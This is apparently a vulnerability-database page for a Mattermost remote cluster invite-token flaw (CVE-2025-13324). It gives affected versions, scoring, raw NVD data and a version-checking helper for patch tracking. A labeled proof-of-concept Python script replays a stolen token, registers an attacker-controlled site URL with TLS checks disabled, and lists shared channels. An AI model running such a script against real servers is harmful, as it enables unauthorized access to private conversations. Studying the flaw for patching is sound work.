Security Vulnerability Report
CVE-2025-13324 CVSS 3.7 LOW

CVE-2025-13324

Published: 2025-12-17 19:16:01
Last Modified: 2025-12-29 18:46:14

Description

Mattermost versions 10.11.x <= 10.11.5, 11.0.x <= 11.0.4, 10.12.x <= 10.12.2 fail to invalidate remote cluster invite tokens when using the legacy (version 1) protocol or when the confirming party does not provide a refreshed token, which allows an attacker who has obtained an invite token to authenticate as the remote cluster and perform limited actions on shared channels even after the invitation has been legitimately confirmed.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (10.11.0 <= version < 10.11.6) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (10.12.0 <= version < 10.12.3) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (11.0.0 <= version < 11.0.5) - VULNERABLE
Mattermost 10.11.x <= 10.11.5
Mattermost 10.12.x <= 10.12.2
Mattermost 11.0.x <= 11.0.4
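Added here as a defender-side helper, not part of the advisory or of Mattermost's own code: a check that maps a Mattermost Server version string onto the affected ranges listed above (start inclusive, fixed version exclusive), for inventory or patch-tracking scripts. It assumes major.minor.patch version strings; a pre-release suffix such as -rc1 is treated as sorting below the corresponding release, so 10.11.6-rc1 still counts as affected.

```python
from typing import Optional, Tuple

# Version ranges copied from the advisory's CPE configuration:
# each branch is vulnerable from start (inclusive) up to end (exclusive).
AFFECTED_RANGES = (
    ("10.11.0", "10.11.6"),
    ("10.12.0", "10.12.3"),
    ("11.0.0", "11.0.5"),
)


def parse_version(version: str) -> Tuple[int, int, int, int]:
    """Map '10.11.5', 'v10.11.5' or '10.11.6-rc1' to a comparable tuple.

    The fourth element is -1 for pre-releases so that 10.11.6-rc1 sorts
    below 10.11.6 (the fixed release) and is therefore still affected.
    """
    text = version.strip().lstrip("v")
    core, _, suffix = text.partition("-")
    core = core.split("+", 1)[0]  # drop build metadata such as +build42
    parts = core.split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a numeric version: {version!r}")
    nums = [int(p) for p in parts]
    nums += [0] * (3 - len(nums))  # "10.11" is read as 10.11.0
    if len(nums) != 3:
        raise ValueError(f"expected major.minor.patch: {version!r}")
    return (nums[0], nums[1], nums[2], -1 if suffix else 0)


def affected_branch(version: str) -> Optional[str]:
    """Return the first fixed version of the matching branch, or None."""
    v = parse_version(version)
    for start, end in AFFECTED_RANGES:
        if parse_version(start) <= v < parse_version(end):
            return end
    return None


def is_affected(version: str) -> bool:
    return affected_branch(version) is not None


if __name__ == "__main__":
    for sample in ("10.11.5", "10.11.6", "10.12.2", "11.0.4", "11.0.5"):
        print(sample, "->", affected_branch(sample) or "not affected")
```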

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13324 PoC - Mattermost Remote Cluster Invite Token Authentication Bypass
# Note: This PoC is for educational purposes only
import requests

TARGET_URL = "https://target-mattermost-server.com"
ATTACKER_TOKEN = "<stolen_invite_token>"


def check_vulnerability():
    """Check if target Mattermost instance is vulnerable"""
    # Step 1: Attempt to establish remote cluster connection using old invite token
    session = requests.Session()
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json",
        "X-Version": "1",  # Legacy protocol version
    }

    # Step 2: Try to confirm remote cluster connection with stale token
    confirm_payload = {
        "remote_cluster_name": "attacker_cluster",
        "site_url": "https://attacker-controlled-site.com",
        "shared_channels_enabled": True,
    }

    response = session.post(
        f"{TARGET_URL}/api/v4/remote_clusters/confirm",
        headers=headers,
        json=confirm_payload,
        verify=False,  # TLS certificate verification is disabled here
    )

    if response.status_code == 200:
        data = response.json()
        if "remote_cluster_id" in data:
            print("[+] VULNERABLE: Successfully bypassed token validation!")
            print(f"[+] Remote Cluster ID: {data['remote_cluster_id']}")
            return True

    print("[-] Target may not be vulnerable or token is invalid")
    return False


def access_shared_channels(remote_cluster_id):
    """Access shared channels after successful bypass"""
    session = requests.Session()
    headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}"}

    # List shared channels
    channels_response = session.get(
        f"{TARGET_URL}/api/v4/channels?remote_cluster_id={remote_cluster_id}",
        headers=headers,
    )

    if channels_response.status_code == 200:
        channels = channels_response.json()
        print(f"[+] Found {len(channels)} shared channels")
        return channels
    return []


if __name__ == "__main__":
    print("CVE-2025-13324 Mattermost Authentication Bypass PoC")
    print("=" * 50)
    check_vulnerability()
```

References

https://mattermost.com/security-updates (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-13324", "sourceIdentifier": "[email protected]", "published": "2025-12-17T19:16:01.093", "lastModified": "2025-12-29T18:46:13.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.5, 11.0.x <= 11.0.4, 10.12.x <= 10.12.2 fail to invalidate remote cluster invite tokens when using the legacy (version 1) protocol or when the confirming party does not provide a refreshed token, which allows an attacker who has obtained an invite token to authenticate as the remote cluster and perform limited actions on shared channels even after the invitation has been legitimately confirmed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.6", "matchCriteriaId": "01DCCC9D-79BE-4B4D-9ECC-1299F88541D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.3", "matchCriteriaId": "DD0ED714-56F9-4C84-B84D-3BF658940568"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.5", "matchCriteriaId": "6130B691-5017-418D-A28A-84A83AA2496C"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```